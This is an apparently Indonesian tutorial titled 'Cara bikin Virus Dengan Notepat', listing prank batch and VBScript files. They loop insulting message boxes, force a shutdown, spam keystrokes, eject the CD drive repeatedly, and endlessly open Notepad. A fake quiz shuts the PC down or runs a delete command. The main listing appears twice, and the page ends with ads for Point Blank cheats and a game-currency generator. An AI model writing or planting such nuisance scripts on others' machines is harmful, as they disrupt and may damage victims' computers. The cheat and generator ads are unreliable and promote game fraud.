1. Cara bikin Virus Dengan Notepat
@ECHO off
:Begin
msg * Jontor Virus Beraksi
msg * Muka lo jelek - ngaca dulu gih
msg * hayo lo,cupu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
save namafile.BAT (ekstensi filenya harus .BAT) Simpan dalam notepat.
2. Cara membuat shutdown+message
Code:
@echo off
msg * apaan sih lo
shutdown -s -c “Error! muka mu standar abis”
save namafile.BAT (ekstensi filenya harus .BAT) Simpan dalam notepat.
3. Cara Mainin Caps Lock button
Code:
[i]Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
save namafile.vbs (save dengan Ekstensi file .vbs) simpan dalam notepat.
4. Cara buka tutup CD/DVD
Code:
Set oWMP = CreateObject(“WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
save namafile.vbs (save dengan Ekstensi file .vbs) simpan dalam notepat.
5. Cara bikin vbscript nongol mlulu
Code:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
save namafile.vbs ket:di task manager full wscript yg lg running
6. Cara bikin teken tombol backspace melulu
Code:
MsgBox “kembali ke menu sebelumnya”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
save namafile.vbs simpan di dalam notepat
7. Cara bikin otomatis ngetik “lu jelek banget sih” di notepad/word
Code:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “lu jelek banget sih!!!”
loop
save namafile.vbs simpan di dalam notepat
8. Cara bikinbuka notepad trus menerus
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
save namafile.BAT
ket:termasuk yang ngeselin banget nih
bisa di ganti,terserah mau buka cmd ato buka yg lain..ganti aja dir nya.
9. Cara bikin otomatis buka notepad lalu ngetik apa yg lo mau
Code:
WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 10
WshShell.AppActivate “Notepad”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “mu “
WScript.Sleep 50
WshShell.SendKeys “je”
WScript.Sleep 50
WshShell.SendKeys “le”
WScript.Sleep 50
WshShell.SendKeys “k “
WScript.Sleep 50
WshShell.SendKeys ” se”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “li”
WScript.Sleep 50
WshShell.SendKeys ” y”
WScript.Sleep 50
WshShell.SendKeys “a”
WScript.Sleep 50
WshShell.SendKeys ” h”
WScript.Sleep 50
WshShell.SendKeys “!”
WScript.Sleep 50
WshShell.SendKeys “!! “
save namafile.vbs
ket:
ini salah satu script favorit gw…
10.@echo off
title quiz hari ini
:menu
cls
echo jika kamu kena virus apa yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t 30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
@ECHO off
:Begin
msg * Jontor Virus Beraksi
msg * Muka lo jelek - ngaca dulu gih
msg * hayo lo,cupu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
save namafile.BAT (ekstensi filenya harus .BAT) Simpan dalam notepat.
2. Cara membuat shutdown+message
Code:
@echo off
msg * apaan sih lo
shutdown -s -c “Error! muka mu standar abis”
save namafile.BAT (ekstensi filenya harus .BAT) Simpan dalam notepat.
3. Cara Mainin Caps Lock button
Code:
[i]Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
save namafile.vbs (save dengan Ekstensi file .vbs) simpan dalam notepat.
4. Cara buka tutup CD/DVD
Code:
Set oWMP = CreateObject(“WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
save namafile.vbs (save dengan Ekstensi file .vbs) simpan dalam notepat.
5. Cara bikin vbscript nongol mlulu
Code:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
save namafile.vbs ket:di task manager full wscript yg lg running
6. Cara bikin teken tombol backspace melulu
Code:
MsgBox “kembali ke menu sebelumnya”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
save namafile.vbs simpan di dalam notepat
7. Cara bikin otomatis ngetik “lu jelek banget sih” di notepad/word
Code:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “lu jelek banget sih!!!”
loop
save namafile.vbs simpan di dalam notepat
8. Cara bikinbuka notepad trus menerus
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
save namafile.BAT
ket:termasuk yang ngeselin banget nih
bisa di ganti,terserah mau buka cmd ato buka yg lain..ganti aja dir nya.
9. Cara bikin otomatis buka notepad lalu ngetik apa yg lo mau
Code:
WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 10
WshShell.AppActivate “Notepad”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “mu “
WScript.Sleep 50
WshShell.SendKeys “je”
WScript.Sleep 50
WshShell.SendKeys “le”
WScript.Sleep 50
WshShell.SendKeys “k “
WScript.Sleep 50
WshShell.SendKeys ” se”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “li”
WScript.Sleep 50
WshShell.SendKeys ” y”
WScript.Sleep 50
WshShell.SendKeys “a”
WScript.Sleep 50
WshShell.SendKeys ” h”
WScript.Sleep 50
WshShell.SendKeys “!”
WScript.Sleep 50
WshShell.SendKeys “!! “
save namafile.vbs
ket:
ini salah satu script favorit gw…
10.@echo off
title quiz hari ini
:menu
cls
echo jika kamu kena virus apa yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t 30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top










» Cheat Point Blank 3-4 september 2014 Auto HS, Ammo, WH, ESP, Macro Mouse, Skill Hack, Damage, HP 120, Anti PI, Anti Banned
» Cheat Point Blank Update Terbaru 2014 + Wallhack,Ammo, 1 Hit,Auto Headshot DLL
» Cheat Point Blank Wallhack 1 HIT 17-18 Agustus 2014, Anti Banned, ALL OS WORK 1000%
» Cheat PB Point Blank Spesial Kemerdekaan 2014 EXP WALLHACK + AUTO HS + 1Hit+Damage 70% Anti Error Dan Vote kick
» Cheat Point Blank 14=20 AGUSTUS 2014 D3D Menu 1 HIT Full Wallhack
» Cheat PB 10-20 2014 Full WH, Baret, Akurasi, SG Kuat, Dll
» Release 29-31 Juli 2014 ( SELAMAT HARI RAYA IDUL FITRI 1435 H ) Cheat Point Blank Jokowi Version Pekalongan Kommunity ( Wallhack, 1 Hit, Skill, No Recoil , Fly / terbang Hack ,1 Hit Sg, AWP Lurus , Ammo, Quick Change, Fullhack
» G-CASH GENERATOR 2014 - 2015 WORK 1000%